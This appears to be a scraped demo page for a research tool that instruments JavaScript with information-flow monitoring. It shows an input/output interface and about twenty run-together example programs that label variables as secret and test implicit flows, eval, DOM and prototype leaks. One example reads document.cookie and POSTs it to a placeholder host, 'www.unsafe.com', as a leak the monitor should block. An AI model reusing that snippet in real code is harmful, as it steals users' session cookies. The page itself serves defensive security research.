Instrumenting JavaScript with Information Flow Monitoring

Full Version of the Paper
Policies for External Interfaces

Input:

//Enter the program to compile here
Randomize Compile Save

Output:

//Output Program: if the program triggers an information flow, its execution is blocked and the background becomes red
Run

• Example 1
• Example 2
• Example 3
• Example 4
• Example 5
• Example 6
• Example 7
• Example 8
• Example 9
• Example 10
• Example 11
• Example 12
• Example 13
• Example 14
• Example 15
• Example 16
• Example 17
• Example 18
• Example 19
• Example 20

var x, y; x = 4; upgVar(x, '2'); y = x + 4; var x, y; y = 3; upgVar(y, '2'); if (y) { x = 2; } var x, y, z; y = 3; upgVar(y, '2'); z = {}; z['p'] = null; upgProp(z, 'p', '2'); if (y) { z['p'] = 2; } var x, y, z; y = 3; upgVar(y, '2'); z = {}; z['p'] = null; if (y) { z['p'] = 2; } var x; eval('x = 3; x') var x, y; x = 0; y = 2; upgVar(y, '2'); if (y) { eval('x = 3; x'); } var text_node, h, l; h = 1; upgVar(h, '2'); if(h) { text_node = document['createTextNode']('macaco'); } l = text_node; var low_integrity_string, text_node, div; low_integrity_string = 'xpto'; upgVar(low_integrity_string, '2'); text_node = document['createTextNode'](low_integrity_string); div = document['createElement']('div'); div['appendChild'](text_node); var xhr, secret; upgVar(secret, '2'); upgProp(document, 'cookie', '2'); xhr = new XMLHttpRequest(); xhr['open']('POST', 'www.unsafe.com/script1.php'); secret = document['cookie']; xhr['send'](secret); var x, y; x = 0; y = 1; upgVar(y, '2'); if(y) { setTimeout('x = 1', 1000); } var n, o; n = 10; o = {}; while(n) { o[n] = n; n = n - 1; alert(n); } var o1, o2, public1, secret, aux_f, public2; secret = confirm('Do you have a secret?'); aux_f = function () { return 'p'; }; o1. toString = aux_f; o2.p = secret; public1 = o2[o1]; if(public1) { public2 = 3; } var o, f_aux; o['p'] = 0; upgStruct (o, '2'); f_aux = function () { return false; }; o['hasOwnProperty'] = f_aux; if(h) { o['p'] = 1; } var Person, p1, low; Person = function(id, name, age) { var this_aux; this_aux = this; this_aux['id'] = id; this_aux['name'] = name; this_aux['age'] = age; upgProp(this_aux, 'id', '2'); } p1 = new Person(1, 'Raquel', 22); low = p1['id']; var Person, p1, high, low; Person = function(id, name, age) { var this_aux; this_aux = this; this_aux['id'] = id; this_aux['name'] = name; this_aux['age'] = age; upgProp(this_aux, 'id', '2'); } p1 = new Person(1, 'Raquel', 22); high = p1['id']; if(high) { low = high + 4; } var Person, p1, aux_var_1; Person = function(id, name, age) { var this_aux; this_aux = this; this_aux['id'] = id; this_aux['name'] = name; this_aux['age'] = age; upgProp(this_aux, 'id', '2'); } aux_var_1 = Person['prototype']; aux_var_1['someSecret'] = 'very secret string'; upgProp(aux_var_1, 'someSecret', '2'); p1 = new Person(1, 'Raquel', 22); high = p1['someSecret']; if (high) { low = high + 4; } var o, h; o = {}; h = 3; upgVar(h, '2'); if(h) { o['p'] = 2; } var o, h; o = {}; h = 3; upgVar(h, '2'); upgStruct(o, '2'); if(h) { o['p'] = 2; } var o, h; var Person, person_proto, function_aux, new_person, high; Person = function(name, id) { var this_aux; this_aux = this; this_aux['name'] = name; this_aux['id'] = id; upgProp(this_aux, 'id', '2'); } person_proto = Person['prototype']; function_aux = function() { var aux_var_1; aux_var_1 = this; aux_var_1 = aux_var_1['id']; return aux_var_1; } person_proto['sayYourId'] = function_aux; new_person = new Person('raquel', 1); high = new_person['sayYourId'](); var o, h; var Person, person_proto, function_aux, new_person, high; Person = function(name, id) { var this_aux; this_aux = this; this_aux['name'] = name; this_aux['id'] = id; upgProp(this_aux, 'id', '2'); } person_proto = Person['prototype']; function_aux = function() { var aux_var_1; aux_var_1 = this; aux_var_1 = aux_var_1['id']; return aux_var_1; } person_proto['sayYourId'] = function_aux; new_person = new Person('raquel', 1); high = new_person['sayYourId'](); if(high) { low = high * 2; }